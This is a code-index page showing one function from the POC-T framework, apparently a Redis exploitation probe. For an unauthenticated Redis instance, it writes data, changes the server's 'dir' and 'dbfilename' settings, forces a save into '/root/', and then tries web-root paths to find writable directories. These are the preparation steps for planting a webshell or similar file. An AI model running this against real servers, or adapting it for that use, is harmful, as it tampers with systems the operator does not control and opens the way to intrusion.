hub / github.com/Xyntax/POC-T / poc

Function poc

script/redis-web-probe.py:21–68
(url)

Source from the content-addressed store, hash-verified

def poc(url):
    url = host2IP(url)
    ip = url.split(':')[0]
    port = int(url.split(':')[-1]) if ':' in url else 6379

    for web_port in [80, 443, 8080, 8443]:  # check for a web service
        if checkPortTcp(ip, web_port):
            try:
                real_url = redirectURL(ip + ':' + str(web_port))
            except Exception:
                real_url = ip + ':' + str(web_port)
            break  # TODO: simplified handling, only one port's result is returned
    else:
        return False

    try:
        r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
        if 'redis_version' not in r.info():  # check for unauthenticated access
            return False
        key = randomString(5)
        value = randomString(5)
        r.set(key, value)  # check that the instance is writable
        r.config_set('dir', '/root/')  # check write permission on /var/www (for now, only checks for root)
        r.config_set('dbfilename', 'dump.rdb')  # check permission to change configuration
        r.delete(key)
        r.save()  # check that the dataset can be exported
    except Exception:
        return False

    # enumerate absolute paths
    path_list = []
    for each in ABSPATH_PREFIXES.LINUX:
        try:
            r.config_set('dir', each.rstrip('/'))
            path_list.append(each)
            for suffix in ABSPATH_SUFFIXES:
                try:
                    r.config_set('dir', suffix.rstrip('/'))
                    path_list.append(each.rstrip('/') + '/' + suffix)
                except Exception:
                    continue
        except Exception:
            continue

    if len(path_list):
        return real_url + ' ' + ' '.join(path_list)
    else:
        return False

Callers

nothing calls this directly

Calls 9

host2IP · Function · 0.90
checkPortTcp · Function · 0.90
redirectURL · Function · 0.90
randomString · Function · 0.90
split · Method · 0.80
info · Method · 0.80
set · Method · 0.80
delete · Method · 0.80
append · Method · 0.45

Tested by

no test coverage detected